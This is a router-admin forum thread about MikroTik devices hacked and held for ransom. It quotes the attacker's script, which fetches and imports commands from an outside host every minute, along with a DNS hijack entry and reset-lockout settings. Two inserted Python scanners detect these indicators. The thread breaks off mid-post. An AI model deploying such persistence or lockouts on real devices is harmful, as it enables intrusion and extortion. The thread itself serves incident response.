humanbot
just joined
Topic Author
Posts: 8
Joined: Sat Oct 30, 2021 5:36 am

Mikrotik router Hacked!!!

Wed Nov 03, 2021 10:39 am

Hi all,

This past week we have been facing a lot of hacking issues on our routers. The symptoms are all the same: the router can still be pinged, it cannot be accessed remotely, L2 traffic works fine but all L3 traffic is down, and the LCD shows nothing. When we try to reboot the router, it crashes with a kernel boot failure.

These are the preventive measures we have taken:

- Non-standard port for remote access to the router (not 8291, 21 or 22)
- /ip/service only allows certain IPs to access the router remotely
- Firewall input rule with a port-scanner detection rule that drops the suspected IP
- Upgraded router firmware and RouterOS to the latest version (6.49)

This has happened on quite a number of our routers of different models (CCR1036, CCR1009, 4011, 3011, 1100, etc.)

Does anybody happen to have the same problem? Is there any other configuration we could do to prevent this?

Thank you
 
jvanhambelgium
Forum Veteran
Posts: 990
Joined: Thu Jul 14, 2016 9:29 pm
Location: Belgium

Re: Mikrotik router Hacked!!!

Wed Nov 03, 2021 11:40 am

What makes you think this has anything to do with "hacking" ?
Some of the issues you mention are possibly normal behaviour with the latest "stable" ROS releases. ;-)
 
afuchs
Frequent Visitor
Posts: 81
Joined: Wed Jul 03, 2019 11:10 am

Re: Mikrotik router Hacked!!!

Wed Nov 03, 2021 12:09 pm

Only because it's not on your list:
- create a new user and delete admin (don't use something like 'noc' or other standard names).
- set up messaging for logins, so you have a chance to notice if someone who shouldn't be is working on it (e.g. email for system,account).

Backups and configuration exports are not mentioned (for recovery with Netinstall if something goes bad).
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik router Hacked!!!

Wed Nov 03, 2021 2:55 pm

Are you allowing access to the router from external sites?
If so how are you doing this?
Which kind of VPN are you using for this access??

/export hide-sensitive file=anynameyouwish
 
mrfloydcro
just joined
Posts: 15
Joined: Fri Aug 23, 2013 10:13 pm

Re: Mikrotik router Hacked!!!

Wed Nov 03, 2021 5:10 pm

Hi,
Have you tried to check in scheduler and scripts, in router, for something unusual?
 
humanbot
just joined
Topic Author
Posts: 8
Joined: Sat Oct 30, 2021 5:36 am

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 4:37 am

What makes you think this has anything to do with "hacking" ?
Some of the issues you mention are possibly normal behaviour with the latest "stable" ROS releases. ;-)

Hi, we are quite sure because over 15 routers have the same issue. Before that we were using the old version 6.3xx; after upgrading to 6.49 the same issue reappeared.
 
humanbot
just joined
Topic Author
Posts: 8
Joined: Sat Oct 30, 2021 5:36 am

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 6:47 am

Are you allowing access to the router from external sites?
If so how are you doing this?
Which kind of VPN are you using for this access??

/export hide-sensitive file=anynameyouwish

Hi,

We have restricted access to the router to certain IPs (office) only. If we are outside the office, we need to do L2TP before we can log in to the router.

We are restricting access using /ip/services, with a non-standard port and only certain IPs allowed to access the router. We also do weekly backups to FTP.

While checking one of our router backups, we found this script:

/script
add dont-require-permissions=no name=fetch owner=god policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\
tool fetch url=http://0.zeroday.ltd/command.scr; :delay 10; /import file-n\
ame=command.scr; :delay 30; /file remove command.scr"

/scheduler
add interval=1m name=fetch1m on-event=fetch policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
start-date=oct/22/2021 start-time=17:05:35

We have tried to download this file "command.scr"; when we open it, it is only an HTML file.

Any other suggestions guys?
 
jvanhambelgium
Forum Veteran
Posts: 990
Joined: Thu Jul 14, 2016 9:29 pm
Location: Belgium

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 9:27 am

Now THAT is indeed something completely different and does not look good (as you guessed, that script should not be there...)
This URL fetch indeed pulls some ROS CLI/script code and can therefore be configured/provisioned with whatever needs to be exploited/attacked at a certain time.

I think the only safe way is to NETINSTALL these devices again.
After that, prepare all the config and only connect to the "Internet" once you have checked that all usernames/passwords/services are hardened.
Probably this was hacked a long time ago with some ROS version that has serious issues.

Perhaps the danger is also coming from "inside" your network?
 
holvoetn
Forum Guru
Posts: 5481
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 10:00 am

It does look like someone has had (still has ?) access to your device.

What I would do:
- Block all external access to that device (pull the WAN cable out, sorry for that but it's needed)
- remove that script and schedule
- review any other script/auto-setting/whatever still available in Files
- review your logs for admin and VPN access
- change password of admin user (better: make new user with admin rights and REMOVE default admin user)
- change L2TP credentials
- review your firewall (enable logging for all possible open ports until you identify the open door)
Obviously someone is able to get in one way or the other so investigate those logs and firewall settings carefully.

Connect WAN again and regularly investigate logs for admin/VPN access. You could use a script to have them mailed to you periodically.
See what happens.

If all fails - emergency situation:
factory reset that router and start again.
Do NOT import any settings/scripts from the old environment without having seen every single line.

Others will surely chime in with alternative (better) suggestions.
EDIT: someone just did.
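holvoetn's advice above, to review the logs for admin and VPN access and script a periodic report, can be automated. The following is an added example and not code from the thread: a Python triage script that reads RouterOS log lines (saved from /log print or sent to a syslog target), flags successful management logins from outside the trusted management networks, counts repeated login failures per source, and ties a login that arrives through an L2TP session back to the PPP account holding that address. The message wording the regexes expect is an assumption based on RouterOS 6.x account logging and should be checked against your own /log output; the sample lines and the trusted networks are constructed.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample in RouterOS /log print style (not real log data).
SAMPLE_LOG = """\
oct/22 17:01:12 system,info,account user admin logged in from 192.168.10.5 via winbox
oct/22 17:03:40 system,error,critical login failure for user admin from 203.0.113.7 via winbox
oct/22 17:03:41 system,error,critical login failure for user admin from 203.0.113.7 via winbox
oct/22 17:03:43 system,error,critical login failure for user admin from 203.0.113.7 via winbox
oct/22 17:05:02 system,info,account user noc logged in from 203.0.113.7 via ssh
oct/22 17:05:35 l2tp,ppp,info,account vpn-user1 logged in, 10.20.0.2
oct/22 17:06:10 system,info,account user admin logged in from 10.20.0.2 via winbox
oct/22 17:07:00 dhcp,info dhcp1 assigned 192.168.10.77 to AA:BB:CC:DD:EE:FF
"""

# Message wording is an assumption based on RouterOS 6.x; verify against your logs.
PPP_LOGIN = re.compile(r"ppp,info,account (\S+) logged in, (\S+)")
LOGIN_OK = re.compile(r"user (\S+) logged in from (\S+) via (\S+)")
LOGIN_FAIL = re.compile(r"login failure for user (\S+) from (\S+) via (\S+)")


def parse_log_line(line):
    """Classify one log line as a ppp/login/fail event, or None if unrelated."""
    for kind, rx in (("ppp", PPP_LOGIN), ("login", LOGIN_OK), ("fail", LOGIN_FAIL)):
        m = rx.search(line)
        if m:
            ev = {"kind": kind, "user": m.group(1), "src": m.group(2)}
            ev["via"] = m.group(3) if kind != "ppp" else "ppp"
            return ev
    return None


def _trusted(src, nets):
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:
        return False  # hostnames and garbage are never trusted
    return any(ip in net for net in nets)


def triage(log_text, trusted_nets, fail_threshold=3):
    """Return {"alerts": [...], "notes": [...]} for the given log text.

    alerts: successful management logins from outside trusted_nets, and
            sources that reach fail_threshold failed logins.
    notes:  management logins that came in through a PPP (e.g. L2TP) session,
            tied back to the VPN account that holds that address.
    """
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    report = {"alerts": [], "notes": []}
    fails, vpn_addr = Counter(), {}
    for line in log_text.splitlines():
        ev = parse_log_line(line)
        if ev is None:
            continue
        if ev["kind"] == "ppp":
            vpn_addr[ev["src"]] = ev["user"]  # address assigned to the VPN account
        elif ev["kind"] == "fail":
            fails[ev["src"]] += 1
            if fails[ev["src"]] == fail_threshold:
                report["alerts"].append(
                    f"brute-force: {fail_threshold} failures for '{ev['user']}' "
                    f"from {ev['src']} via {ev['via']}")
        elif ev["kind"] == "login":
            if ev["src"] in vpn_addr:
                report["notes"].append(
                    f"'{ev['user']}' logged in via {ev['via']} from {ev['src']} "
                    f"(VPN session of {vpn_addr[ev['src']]})")
            elif not _trusted(ev["src"], nets):
                report["alerts"].append(
                    f"login from untrusted source: '{ev['user']}' from {ev['src']} via {ev['via']}")
    return report


if __name__ == "__main__":
    r = triage(SAMPLE_LOG, ["192.168.10.0/24", "10.20.0.0/24"])
    for a in r["alerts"]:
        print("ALERT", a)
    for n in r["notes"]:
        print("note ", n)
```

Feed it the output of /log print from each router (or a remote syslog file) from a scheduled job and mail the result; a logged-in user that is neither on the office network nor behind a known VPN session is exactly the "open door" holvoetn is talking about.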
 
Jotne
Forum Guru
Posts: 3297
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 10:36 am

Your router was hacked before it was upgraded, due to a bug in Winbox on older versions.

There is only one good solution:
Netinstall
Do NOT restore the config
Export the old config and add manually only what is needed.
 
tangent
Forum Guru
Posts: 1390
Joined: Thu Jul 01, 2021 3:15 pm

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 1:35 pm

Your router was hacked before it was upgraded, due to bug in Winbox on older version.

I agree. The "zeroday.ltd" bit looks suspiciously like this post, which points to this 3-year-old CVE. OP may be part of the Mēris resurgence.
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 3:16 pm

Remove all devices from the internet.
Export the config so you can remember the NEEDED settings, but don't copy blindly.
As stated, netinstall and do not copy the old config to the new firmware.
Do not use any of the same passwords, and change the port number for winbox or ssh, for example.

Ensure all connected PCs etc. are fully scanned for viruses/malware etc......
 
humanbot
just joined
Topic Author
Posts: 8
Joined: Sat Oct 30, 2021 5:36 am

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 5:04 pm

Hi,

We have removed the hacked devices and replaced them with new ones; we added new settings and removed all mac-telnet and mac-winbox capabilities. But after a day or so, they are being hacked again. Really confused and frustrated with what's going on.

All the hacked routers have a random reset timer set, so they are very hard to reset. After much patience, we managed to reset 40% of the routers, but the rest is still ongoing. After each reset, we netinstall the router and it feels brand new.

But after we put it into production, it gets hacked as well, just like the new routers.

All PPP secrets, scripts, the scheduler, and all of the admin computers (with full and write authority) have been scanned with antivirus; all checked and no problem. We have also changed the default username to a strange name with a hard password.

We are wondering: is this an exploit bug in MikroTik or a hole in the Linux OS that MikroTik runs on?

Any idea guys?
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 5:08 pm

Yes, stop using infected routers.
You need to do a fresh Netinstall with the latest firmware.
Use different passwords etc.......
CHANGE ALL YOUR VPN settings; everything should be different from before.
Assume all passwords and secrets of all settings are known.


The only way you are being hacked is if you are not following basic security instructions.
The exploit is your own stupidity as an admin........... also for not keeping routers up to date ................
 
holvoetn
Forum Guru
Posts: 5481
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 5:52 pm

A bit harsh but it does boil down to this, yes.

<removed part, anav already said the same>
Last edited by holvoetn on Thu Nov 04, 2021 9:01 pm, edited 2 times in total.
 
holvoetn
Forum Guru
Posts: 5481
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 9:00 pm

Adding an analogy, maybe it will become more clear:

Water is pouring from the tap, sink is spilling over.
What do you do first ?
Clean up the spilled water or close the tap ?

Right now it looks like you're only cleaning... you'll keep doing that until you close the tap.
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 11:03 pm

Adding an analogy, maybe it will become more clear:

Water is pouring from the tap, sink is spilling over.
What do you do first ?
Clean up the spilled water or close the tap ?

Right now it looks like you're only cleaning... you'll keep doing that until you close the tap.

A much kinder way of saying that, thanks holvoetn, but not even close to satisfying ;-)
 
holvoetn
Forum Guru
Posts: 5481
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 11:09 pm

I know.
Still learning that part too :lol:
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 11:11 pm

I know.
Still learning that part too :lol:

Well, anybody that calls themselves an admin is allowed to make mistakes, but when
they repeat the same mistakes after being given information on how to avoid it............................ blunt is less refined but more appropriate.
 
infabo
Long time Member
Posts: 677
Joined: Thu Nov 12, 2020 12:07 pm

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 11:40 pm

5t0cxa.jpg
 
jvanhambelgium
Forum Veteran
Posts: 990
Joined: Thu Jul 14, 2016 9:29 pm
Location: Belgium

Re: Mikrotik router Hacked!!!

Thu Nov 04, 2021 11:40 pm

Ok, but he writes:

All the hacked routers have a random reset timer set, so they are very hard to reset. After much patience, we managed to reset 40% of the routers, but the rest is still ongoing. After each reset, we netinstall the router and it feels brand new.

So IF he effectively net-installed an infected one, deployed 6.47/6.48/6.49 on it, created strong usernames/passwords and locked down services, and it STILL gets infected?!

Very strange story and probably we are not getting the full context here...
 
humanbot
just joined
Topic Author
Posts: 8
Joined: Sat Oct 30, 2021 5:36 am

Re: Mikrotik router Hacked!!!

Fri Nov 05, 2021 2:56 am

Hi all,

We agree that this was caused by our stupidity, but everything said in this thread has been done. We will recheck everything again to make sure nothing is skipped.

On netinstall, yes, we immediately install the newest version. And we don't import the config into the router; what we did is copy and paste each line of config that we checked and saw fit. Nothing sneaky got pasted into the config.

jvanhambelgium, yes, we netinstalled and changed to a new random username/password on the newly installed router.

One thing we did today is shut down our RADIUS server; it's a Linux server and we use it for AAA for login. The username/password on each router is only for emergency backup.

The reason we hadn't done that at first is that we had checked all the logs and scanned the RADIUS server as well; nothing was weird and it's sitting on a private IP.

Does anyone have experience with this?
 
holvoetn
Forum Guru
Posts: 5481
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Mikrotik router Hacked!!!

Fri Nov 05, 2021 8:30 am


So IF he effectively net-installed an infected one, deployed 6.47/6.48/6.49 on it, created strong usernames/passwords and locked down services, and it STILL gets infected?!

Very strange story and probably we are not getting the full context here...

This can only mean (I think) that one way or the other the malicious code is already inside AND is somehow being used to re-infect those routers.

Don't trust a thing. Not even your backups!
Download ALL packages needed for the reinstall anew, if possible from a device not on your network. Do not reuse anything which comes from an internal source.
Do not have these newly installed routers make management connections to internal resources (only traffic, obviously).
If possible, allow (temporarily) only MAC management access to such a router using one of the eth ports. Not via VPN, not via other LAN sources.
If you say you already handled a couple of routers and they get re-infected, start over with a couple and put very close monitoring on those devices to see when and how it happens again.

A freshly installed router with a proper firewall and proper admin access can normally not be hacked.
There has to be a Trojan Horse hiding...
 
macgaiver
Forum Guru
Posts: 1764
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: Mikrotik router Hacked!!!

Fri Nov 05, 2021 3:06 pm

There is information about Windows malware that knows how to connect to an MT router with the default password and make configuration changes to add it to a botnet.

So admin with no password on the local network is not safe anymore.

I'm not sure if the same malware compares credentials against a database of credentials that were acquired with the Winbox vulnerability last year, but if any hacked router has your username and password on it, I wouldn't use them on any router ever again.
 
biomesh
Long time Member
Posts: 562
Joined: Fri Feb 10, 2012 8:25 pm

Re: Mikrotik router Hacked!!!

Fri Nov 05, 2021 3:11 pm

It would be also interesting to see exports from what you call a good/clean config vs one that is hacked.
 
pe1chl
Forum Guru
Posts: 10223
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mikrotik router Hacked!!!

Fri Nov 05, 2021 4:50 pm

There is information about Windows malware that knows how to connect to an MT router with the default password and make configuration changes to add it to a botnet.

So admin with no password on the local network is not safe anymore.

Well, this has to be changed by MikroTik anyway, as from 2024 it will be forbidden to sell devices in the EU in the state they are in now (standard default password).
Other manufacturers are already selling devices with a default password printed on a sticker, not derived from the MAC address or serial number.
Some recent "pre-configured" MikroTik devices have this as well, but the password is lost on a factory reset. So that still has to be improved.
 
holvoetn
Forum Guru
Posts: 5481
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Mikrotik router Hacked!!!

Fri Nov 05, 2021 5:15 pm

There is information about Windows malware that knows how to connect to an MT router with the default password and make configuration changes to add it to a botnet.

So admin with no password on the local network is not safe anymore.

Well, this has to be changed by MikroTik anyway, as from 2024 it will be forbidden to sell devices in the EU in the state they are in now (standard default password).
Other manufacturers are already selling devices with a default password printed on a sticker, not derived from the MAC address or serial number.
Some recent "pre-configured" MikroTik devices have this as well, but the password is lost on a factory reset. So that still has to be improved.

Last time I checked, Latvia is part of the EU, so they should be more than aware.
And otherwise there is still an import possible through some UK channels (since they decided to leave the EU :lol: )

The problem with such regulations (as usual) is that they cannot be enforced retroactively.
What is sold and in the field does not have to be retrofitted.

But I fully agree it is anyhow a good measure to put in place as of ... yesterday.

PS there are some others who also have some work on their plate in that respect. I'm looking at Netgear, HP, Dell, ... just to name a few I encountered in the past months.
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik router Hacked!!!

Fri Nov 05, 2021 6:44 pm

There is a difference between a homeowner being protected by such password rules.........
and a trained admin who should know how to configure a router securely. The EU rules are for the untrained masses.
 
maigonis
Member Candidate
Posts: 185
Joined: Sat Jul 20, 2019 8:16 pm

Re: Mikrotik router Hacked!!!

Sat Nov 06, 2021 2:26 am

On a PC, run live Linux or install Linux and netinstall from there. No backups, fresh passwords. Do the netinstall without internet connected to the Linux machine and don't connect the router to the network; monitor for 24h. It is not possible to get reinfected after netinstall from the same device, or you have found a new, very aggressive rootkit that lives somewhere in the router that netinstall is not wiping.
 
a57068368
just joined
Posts: 4
Joined: Sun Sep 15, 2019 4:13 pm
Location: china

Re: Mikrotik router Hacked!!!

Tue Nov 09, 2021 4:40 am

command.scr

I downloaded it and opened it, and that's all there is:

/ip dns static add address=2.56.213.19 name=download.simplemining.net ttl="7d 00:00:00"
 
pe1chl
Forum Guru
Posts: 10223
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mikrotik router Hacked!!!

Tue Nov 09, 2021 10:59 am

That is only part of the hack for sure. There must be more hiding in your router. It may not be visible from the commandline.
 
humanbot
just joined
Topic Author
Posts: 8
Joined: Sat Oct 30, 2021 5:36 am

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 6:10 am

HI All,

Finally we managed to keep the hacker out. As you all said, they already had our username/password and the port to access the router. We had to disable our RADIUS server for login and change to a different port for login, with a new user/password.

It turns out this is a ransom hack; they left a note in Neighbours and we tried to contact them. After paying the ransom, we managed to get back control of the routers.

There's a config that they put in to prevent us from resetting the router and doing netinstall:

/system routerboard settings
set baud-rate=2400 boot-device=nand-only protected-routerboot=enabled \
reformat-hold-button=3m37s reformat-hold-button-max=3m47s silent-boot=yes

The time that they set is very random and very hard to guess; sometimes even after a whole day, no router has been reset yet.

My questions:
1. Why was this feature introduced? It makes it harder for us to reset a router. Is it possible that someone wants to hack our router physically by resetting it on site? I think the probability is very low; a physical router without configuration is useless.
2. Is there a way to bypass this? Maybe some backdoor way to reset and netinstall the router?
3. Even if this is a needed feature, shouldn't it have a maximum time, maybe 3 minutes? More than that is highly unlikely to be an accidental reset.

Thank you
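The indicators in this thread (the fetch-and-import script with its 1-minute scheduler posted earlier, the static DNS entry found in command.scr, and the protected-routerboot settings in the post above) can all be found by reading a plain /export. The following Python scanner is an added example, not code from the thread or from MikroTik: it undoes RouterOS line wrapping, parses each add/set command, and reports those four indicators. The sample export is constructed from what was posted in the thread; the section paths /system script and /system scheduler are the full export paths for the /script and /scheduler shorthand in the post, and the trusted-owner list and the example.net domain are placeholders to replace with your own.

```python
import re

# Constructed export fragment modelled on what was posted in this thread
# (the fetch script and scheduler, the command.scr line and the routerboard
# settings), plus one benign script so the scanner has something to ignore.
SAMPLE_EXPORT = r"""
/system script
add name=backup owner=admin policy=read,write source="/export file=daily"
add dont-require-permissions=no name=fetch owner=god policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\
    tool fetch url=http://0.zeroday.ltd/command.scr; :delay 10; /import file-n\
    ame=command.scr; :delay 30; /file remove command.scr"
/system scheduler
add interval=1m name=fetch1m on-event=fetch policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-date=oct/22/2021 start-time=17:05:35
/ip dns static
add address=2.56.213.19 name=download.simplemining.net ttl="7d 00:00:00"
/system routerboard settings
set baud-rate=2400 boot-device=nand-only protected-routerboot=enabled \
    reformat-hold-button=3m37s reformat-hold-button-max=3m47s silent-boot=yes
"""


def join_continuations(text):
    """Undo RouterOS export line wrapping: a trailing backslash continues the
    command on the next (indented) line, possibly in the middle of a word."""
    out, pending = [], None
    for raw in text.splitlines():
        line = raw if pending is None else pending + raw.lstrip()
        if line.endswith("\\"):
            pending = line[:-1]
        else:
            out.append(line)
            pending = None
    return out


# key=value pairs; quoted values may contain spaces and '=' signs.
KV = re.compile(r'([\w.-]+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_export(text):
    """Return (section, verb, {key: value}) for every add/set command."""
    entries, section = [], None
    for line in join_continuations(text):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line
            continue
        verb, _, rest = line.partition(" ")
        args = {k: (v[1:-1] if v.startswith('"') else v) for k, v in KV.findall(rest)}
        entries.append((section, verb, args))
    return entries


# A script that fetches code over the network and then imports it.
FETCH = re.compile(r"\bfetch\b[^;]*?url=\"?(?:https?|ftp)://([^\s\"/;]+)")
IMPORT = re.compile(r"\bimport\b")


def scan(text, trusted_owners=("admin",), own_domains=("example.net",)):
    """Return (section, name, reason) findings for the indicators seen in the thread."""
    entries = parse_export(text)
    findings, downloaders = [], set()
    # Pass 1: find downloader scripts first, so schedulers can be tied to them
    # whatever order the sections appear in.
    for section, _, a in entries:
        src = a.get("source", "")
        if section == "/system script" and FETCH.search(src) and IMPORT.search(src):
            downloaders.add(a.get("name", ""))
    # Pass 2: report.
    for section, _, a in entries:
        name = a.get("name", "?")
        if section == "/system script":
            if name in downloaders:
                host = FETCH.search(a["source"]).group(1)
                findings.append((section, name, f"fetches and imports code from {host}"))
            owner = a.get("owner")
            if owner and owner not in trusted_owners:
                findings.append((section, name, f"unexpected owner '{owner}'"))
        elif section == "/system scheduler":
            ev = a.get("on-event", "")
            if ev in downloaders or FETCH.search(ev):
                findings.append((section, name, f"re-runs downloader every {a.get('interval', '?')}"))
        elif section == "/ip dns static":
            if name != "?" and not name.endswith(tuple(own_domains)):
                findings.append((section, name, f"static DNS override to {a.get('address')}"))
        elif section == "/system routerboard settings":
            if a.get("protected-routerboot") == "enabled":
                lo = a.get("reformat-hold-button", "default")
                hi = a.get("reformat-hold-button-max", "default")
                findings.append((section, "protected-routerboot",
                                 f"enabled; reset button must be held {lo}..{hi}"))
    return findings


if __name__ == "__main__":
    for section, name, reason in scan(SAMPLE_EXPORT):
        print(f"{section:30} {name:28} {reason}")
```

Run it over the /export output saved from each router before and after Netinstall; a clean router should produce no findings, and the protected-routerboot line in particular should be compared with the values you set yourself before anything goes back into production.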
 
jvanhambelgium
Forum Veteran
Posts: 990
Joined: Thu Jul 14, 2016 9:29 pm
Location: Belgium

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 10:17 am

Hmm, that is an interesting approach the hacker/ransom guys took....
I did not even know it existed and believed that with a netinstall + physical access to the device you can always get things fixed! NOT!

This setting can clearly cause serious havoc like you experienced.... this is as good as encrypting your files....

reformat-hold-button-max (5s .. 600s; Default: 10m)

Increase the security even further by setting the max hold time, this means that you must release the reset button within a specified time interval.
If you set the "reformat-hold-button" to 60s and "reformat-hold-button-max" to 65s,
it will mean that you must hold the button 60 to 65 seconds, not less and not more, making guesses impossible. Introduced in RouterBOOT 3.38.3
 
BartoszP
Forum Guru
Posts: 2879
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 10:33 am

Was this ransom lower than the cost of a new router? Wasn't it easier to replace devices?
 
msatter
Forum Guru
Posts: 2912
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 1:58 pm

Does anyone have a good idea how to avoid this kind of ransom lockout of a router?

This reformat protection was introduced as a security feature and is now used to lock out the owner completely.

I think this can be avoided by enforcing a manual press of the button before the protection is enforced.

My thoughts:
Working: activate protection in the router. The router has to be rebooted before
making it permanent. On reboot the owner has to press the button once, for the exact time set in the reformat protection.

If this is not done or the time is wrong, the protection is not made permanent and a warning is displayed in the terminal and, if possible, in the window where you set the reformat protection.

Edit: if the settings are not made permanent they are erased and the procedure has to be started from the beginning.

It is a pity that something like this was not implemented when it was introduced.
Last edited by msatter on Wed Nov 10, 2021 2:19 pm, edited 2 times in total.
 
freemannnn
Forum Veteran
Posts: 700
Joined: Sun Oct 13, 2013 7:29 pm

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 2:10 pm

Note from Mikrotik Manual : RouterBOARD that has the protected RouterBOOT setting enabled will blink the LED every second, to make counting easier. The LED will turn off for one second, and turn on for the next second.

https://wiki.mikrotik.com/wiki/Manual:R ... D_settings
Last edited by freemannnn on Wed Nov 10, 2021 2:26 pm, edited 1 time in total.
 
msatter
Forum Guru
Posts: 2912
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 2:18 pm

That's one blink every two seconds. For counting, the current implementation is perfect.
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 4:02 pm

Can we clarify, that a hacked router can be modified so that the normal netinstall process will not work?
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 4:54 pm

The protected RouterBOOT is only there to prevent starting the router via etherboot and stealing the config / certificates / files inside.
The protected RouterBOOT does not prevent netinstall, because after at least 600s with reset pressed,
the BIOS formats the NAND/Flash and clears the RouterBOOT settings at the end;
after that it starts etherboot for Netinstall.

EDIT: Please read post #51 viewtopic.php?t=179987#p890288

Obviously it is still possible to unsolder the NAND/Flash chip and read it with special hardware as if it were a USB drive.
Last edited by rextended on Wed Nov 10, 2021 6:36 pm, edited 1 time in total.
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 5:04 pm

Trolling again I see, @rextended. Do read the manual please.
https://wiki.mikrotik.com/wiki/Manual:R ... D_settings
reformat-hold-button-max (5s .. 600s; Default: 10m)
Increase the security even further by setting the max hold time, this means that you must release the reset button within a specified time interval. If you set the "reformat-hold-button" to 60s and "reformat-hold-button-max" to 65s, it will mean that you must hold the button 60 to 65 seconds, not less and not more, making guesses impossible. Introduced in RouterBOOT 3.38.3
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 5:07 pm

The procedure is for starting etherboot / netinstall.
It is still possible to clear everything and use the router again (obviously losing everything inside).
The protected RouterBOOT does not prevent a reset.

EDIT: Please read post #51 viewtopic.php?t=179987#p890288

Normis:

viewtopic.php?t=94303#p470958

viewtopic.php?t=94303#p475163
Last edited by rextended on Wed Nov 10, 2021 6:37 pm, edited 3 times in total.
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 5:17 pm

Oh tell us, oh mighty one, how does one guess the reformat-hold-button and reformat-hold-button-max if the hacker changed the defaults, values that are needed in order to perform a reformat?
Again, from the manual; I'll repost with the key words in bold.
If you set the "reformat-hold-button" to 60s and "reformat-hold-button-max" to 65s, it will mean that you must hold the button 60 to 65 seconds, not less and not more, making guesses impossible.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 5:22 pm

You do understand that you can hold the button for more than 600s?

viewtopic.php?t=94303#p498657
>>> [...] But what exactly happens when someone holds reset button more then 5 minutes? [...]
Normis: [...] Just like manual explains, it will erase the NAND in a secure way, and essentially Brick the device [...]

Stop trolling and read what the others write. If you do not trust Normis, you have no hope.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 5:26 pm

viewtopic.php?t=94303#p513933

Normis:

This feature is not to prevent something from being stolen. It is to protect your data.
The feature allows to block device from using network boot to access your data without password.
By using protected routerboot, a forgotten password will mean to nullify your NAND, then Netinstall.
This way, if somebody steals your device, your config and passwords are safe.
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 5:27 pm

As I wrote also above (and in the docs linked), reformat-hold-button-max (5s .. 600s; Default: 10m) Introduced in RouterBOOT 3.38.3
That feature wasn't around when normis wrote that, in 2015.
Last edited by Znevna on Wed Nov 10, 2021 5:28 pm, edited 1 time in total.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 5:27 pm

And I'm also the author of this guide, written some time ago...
viewtopic.php?t=94303#p580430
 
rextended
Forum Guru
